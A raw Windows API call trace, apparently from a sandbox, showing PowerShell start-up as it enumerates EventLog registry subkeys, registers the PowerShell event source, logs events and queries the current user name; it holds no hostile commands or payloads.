	[0484.607] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x0, lpName=0x207ef0, lpcchName=0x16d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.607] CoTaskMemFree (pv=0x207ef0) 
	[0484.607] CoTaskMemFree (pv=0x0) 
	[0484.608] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0484.608] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x1, lpName=0x207ef0, lpcchName=0x16d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.608] CoTaskMemFree (pv=0x207ef0) 
	[0484.608] CoTaskMemFree (pv=0x0) 
	[0484.608] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0484.608] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x2, lpName=0x207ef0, lpcchName=0x16d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.608] CoTaskMemFree (pv=0x207ef0) 
	[0484.608] CoTaskMemFree (pv=0x0) 
	[0484.608] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0484.608] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x3, lpName=0x207ef0, lpcchName=0x16d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.608] CoTaskMemFree (pv=0x207ef0) 
	[0484.608] CoTaskMemFree (pv=0x0) 
	[0484.608] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0484.608] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x4, lpName=0x207ef0, lpcchName=0x16d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.608] CoTaskMemFree (pv=0x207ef0) 
	[0484.608] CoTaskMemFree (pv=0x0) 
	[0484.608] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0484.608] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x5, lpName=0x207ef0, lpcchName=0x16d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.609] CoTaskMemFree (pv=0x207ef0) 
	[0484.609] CoTaskMemFree (pv=0x0) 
	[0484.609] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0484.609] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x6, lpName=0x207ef0, lpcchName=0x16d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.609] CoTaskMemFree (pv=0x207ef0) 
	[0484.609] CoTaskMemFree (pv=0x0) 
	[0484.609] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0484.609] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x7, lpName=0x207ef0, lpcchName=0x16d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.609] CoTaskMemFree (pv=0x207ef0) 
	[0484.609] CoTaskMemFree (pv=0x0) 
	[0484.609] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0484.609] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x8, lpName=0x207ef0, lpcchName=0x16d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.609] CoTaskMemFree (pv=0x207ef0) 
	[0484.609] CoTaskMemFree (pv=0x0) 
	[0484.609] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x358) returned 0x0
	[0484.609] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x0) returned 0x2
	[0484.610] RegOpenKeyExW (in: hKey=0x354, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x35c) returned 0x0
	[0484.610] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x0) returned 0x2
	[0484.610] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x360) returned 0x0
	[0484.610] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x0) returned 0x2
	[0484.610] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x364) returned 0x0
	[0484.610] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x0) returned 0x2
	[0484.610] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x368) returned 0x0
	[0484.610] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x0) returned 0x2
	[0484.610] RegOpenKeyExW (in: hKey=0x354, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x36c) returned 0x0
	[0484.611] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x0) returned 0x2
	[0484.611] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x370) returned 0x0
	[0484.611] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x0) returned 0x2
	[0484.611] RegOpenKeyExW (in: hKey=0x354, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x374) returned 0x0
	[0484.611] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x0) returned 0x2
	[0484.611] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x378) returned 0x0
	[0484.611] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x37c) returned 0x0
	[0484.611] RegCloseKey (hKey=0x37c) returned 0x0
	[0484.612] RegCloseKey (hKey=0x354) returned 0x0
	[0484.612] RegCloseKey (hKey=0x378) returned 0x0
	[0484.613] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d248 | out: phkResult=0x16d248*=0x378) returned 0x0
	[0484.613] RegQueryInfoKeyW (in: hKey=0x378, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d1bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d1b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d1bc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d1b8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.613] CoTaskMemFree (pv=0x0) 
	[0484.613] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0484.613] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x0, lpName=0x207ef0, lpcchName=0x16d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.613] CoTaskMemFree (pv=0x207ef0) 
	[0484.613] CoTaskMemFree (pv=0x0) 
	[0484.613] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0484.613] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x1, lpName=0x207ef0, lpcchName=0x16d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.613] CoTaskMemFree (pv=0x207ef0) 
	[0484.613] CoTaskMemFree (pv=0x0) 
	[0484.613] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0484.613] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x2, lpName=0x207ef0, lpcchName=0x16d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.613] CoTaskMemFree (pv=0x207ef0) 
	[0484.613] CoTaskMemFree (pv=0x0) 
	[0484.614] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0484.614] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x3, lpName=0x207ef0, lpcchName=0x16d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.614] CoTaskMemFree (pv=0x207ef0) 
	[0484.614] CoTaskMemFree (pv=0x0) 
	[0484.614] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0484.614] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x4, lpName=0x207ef0, lpcchName=0x16d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.614] CoTaskMemFree (pv=0x207ef0) 
	[0484.614] CoTaskMemFree (pv=0x0) 
	[0484.614] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0484.614] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x5, lpName=0x207ef0, lpcchName=0x16d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.614] CoTaskMemFree (pv=0x207ef0) 
	[0484.614] CoTaskMemFree (pv=0x0) 
	[0484.614] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0484.614] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x6, lpName=0x207ef0, lpcchName=0x16d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.614] CoTaskMemFree (pv=0x207ef0) 
	[0484.614] CoTaskMemFree (pv=0x0) 
	[0484.614] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0484.614] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x7, lpName=0x207ef0, lpcchName=0x16d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.615] CoTaskMemFree (pv=0x207ef0) 
	[0484.615] CoTaskMemFree (pv=0x0) 
	[0484.615] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0484.615] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x8, lpName=0x207ef0, lpcchName=0x16d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.615] CoTaskMemFree (pv=0x207ef0) 
	[0484.615] CoTaskMemFree (pv=0x0) 
	[0484.615] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x354) returned 0x0
	[0484.615] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x0) returned 0x2
	[0484.615] RegOpenKeyExW (in: hKey=0x378, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x37c) returned 0x0
	[0484.615] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x0) returned 0x2
	[0484.615] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x380) returned 0x0
	[0484.615] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x0) returned 0x2
	[0484.616] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x384) returned 0x0
	[0484.616] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x0) returned 0x2
	[0484.616] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x388) returned 0x0
	[0484.616] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x0) returned 0x2
	[0484.616] RegOpenKeyExW (in: hKey=0x378, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x38c) returned 0x0
	[0484.616] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x0) returned 0x2
	[0484.616] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x390) returned 0x0
	[0484.616] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x0) returned 0x2
	[0484.616] RegOpenKeyExW (in: hKey=0x378, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x394) returned 0x0
	[0484.616] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x0) returned 0x2
	[0484.617] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x398) returned 0x0
	[0484.617] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2a8 | out: phkResult=0x16d2a8*=0x39c) returned 0x0
	[0484.617] RegCloseKey (hKey=0x39c) returned 0x0
	[0484.617] RegCloseKey (hKey=0x378) returned 0x0
	[0484.618] RegCloseKey (hKey=0x398) returned 0x0
	[0484.619] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d218 | out: phkResult=0x16d218*=0x398) returned 0x0
	[0484.619] RegQueryInfoKeyW (in: hKey=0x398, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d18c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d188, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d18c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d188*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.619] CoTaskMemFree (pv=0x0) 
	[0484.619] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0484.619] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x0, lpName=0x207ef0, lpcchName=0x16d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.619] CoTaskMemFree (pv=0x207ef0) 
	[0484.620] CoTaskMemFree (pv=0x0) 
	[0484.620] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0484.620] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x1, lpName=0x207ef0, lpcchName=0x16d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.620] CoTaskMemFree (pv=0x207ef0) 
	[0484.620] CoTaskMemFree (pv=0x0) 
	[0484.620] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0484.620] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x2, lpName=0x207ef0, lpcchName=0x16d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.620] CoTaskMemFree (pv=0x207ef0) 
	[0484.620] CoTaskMemFree (pv=0x0) 
	[0484.620] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0484.620] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x3, lpName=0x207ef0, lpcchName=0x16d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.620] CoTaskMemFree (pv=0x207ef0) 
	[0484.620] CoTaskMemFree (pv=0x0) 
	[0484.620] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0484.620] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x4, lpName=0x207ef0, lpcchName=0x16d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.620] CoTaskMemFree (pv=0x207ef0) 
	[0484.620] CoTaskMemFree (pv=0x0) 
	[0484.620] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0484.620] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x5, lpName=0x207ef0, lpcchName=0x16d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.621] CoTaskMemFree (pv=0x207ef0) 
	[0484.621] CoTaskMemFree (pv=0x0) 
	[0484.621] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0484.621] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x6, lpName=0x207ef0, lpcchName=0x16d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.621] CoTaskMemFree (pv=0x207ef0) 
	[0484.621] CoTaskMemFree (pv=0x0) 
	[0484.621] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0484.621] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x7, lpName=0x207ef0, lpcchName=0x16d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.621] CoTaskMemFree (pv=0x207ef0) 
	[0484.621] CoTaskMemFree (pv=0x0) 
	[0484.621] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0484.621] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x8, lpName=0x207ef0, lpcchName=0x16d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.621] CoTaskMemFree (pv=0x207ef0) 
	[0484.621] CoTaskMemFree (pv=0x0) 
	[0484.621] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d278 | out: phkResult=0x16d278*=0x378) returned 0x0
	[0484.621] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d278 | out: phkResult=0x16d278*=0x0) returned 0x2
	[0484.622] RegOpenKeyExW (in: hKey=0x398, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d278 | out: phkResult=0x16d278*=0x39c) returned 0x0
	[0484.622] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d278 | out: phkResult=0x16d278*=0x0) returned 0x2
	[0484.622] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d278 | out: phkResult=0x16d278*=0x3a0) returned 0x0
	[0484.622] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d278 | out: phkResult=0x16d278*=0x0) returned 0x2
	[0484.622] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d278 | out: phkResult=0x16d278*=0x3a4) returned 0x0
	[0484.622] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d278 | out: phkResult=0x16d278*=0x0) returned 0x2
	[0484.622] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d278 | out: phkResult=0x16d278*=0x3a8) returned 0x0
	[0484.622] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d278 | out: phkResult=0x16d278*=0x0) returned 0x2
	[0484.622] RegOpenKeyExW (in: hKey=0x398, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d278 | out: phkResult=0x16d278*=0x3ac) returned 0x0
	[0484.623] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d278 | out: phkResult=0x16d278*=0x0) returned 0x2
	[0484.623] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d278 | out: phkResult=0x16d278*=0x3b0) returned 0x0
	[0484.623] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d278 | out: phkResult=0x16d278*=0x0) returned 0x2
	[0484.623] RegOpenKeyExW (in: hKey=0x398, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d278 | out: phkResult=0x16d278*=0x3b4) returned 0x0
	[0484.623] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d278 | out: phkResult=0x16d278*=0x0) returned 0x2
	[0484.623] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d278 | out: phkResult=0x16d278*=0x3b8) returned 0x0
	[0484.623] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d278 | out: phkResult=0x16d278*=0x3bc) returned 0x0
	[0484.623] RegCloseKey (hKey=0x3bc) returned 0x0
	[0484.624] RegCloseKey (hKey=0x398) returned 0x0
	[0484.624] RegCloseKey (hKey=0x3b8) returned 0x0
	[0484.631] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1ba00008
	[0485.432] ReportEventW (hEventLog=0x1ba00008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f3aed0*="WSMan", lpRawData=0x2f3ac40) returned 1
	[0485.434] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0485.434] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0485.434] CoTaskMemFree (pv=0x252be0) 
	[0485.436] CoTaskMemAlloc (cb=0x804) returned 0x1b81d800
	[0485.436] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b81d800, nSize=0x16d508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d508) returned 0x1
	[0485.436] CoTaskMemFree (pv=0x1b81d800) 
	[0485.436] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
	[0485.436] GetUserNameW (in: lpBuffer=0x207ef0, pcbBuffer=0x16d548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d548) returned 1
	[0485.436] CoTaskMemFree (pv=0x207ef0) 
	[0485.436] ReportEventW (hEventLog=0x1ba00008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f40408*="Alias", lpRawData=0x2f40198) returned 1
	[0485.438] CoTaskMemAlloc (cb=0x104) returned 0x252be0
	[0485.438] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0485.438] CoTaskMemFree (pv=0x252be0) 
	[0485.439] CoTaskMemAlloc (cb=0x804) returned 0x1b81d800
	[0485.439] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b81d800, nSize=0x16d508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d508) returned 0x1
	[0485.440] CoTaskMemFree (pv=0x1b81d800) 
	[0485.440] CoTaskMemAlloc (cb=0x204) returned 0x207ef0
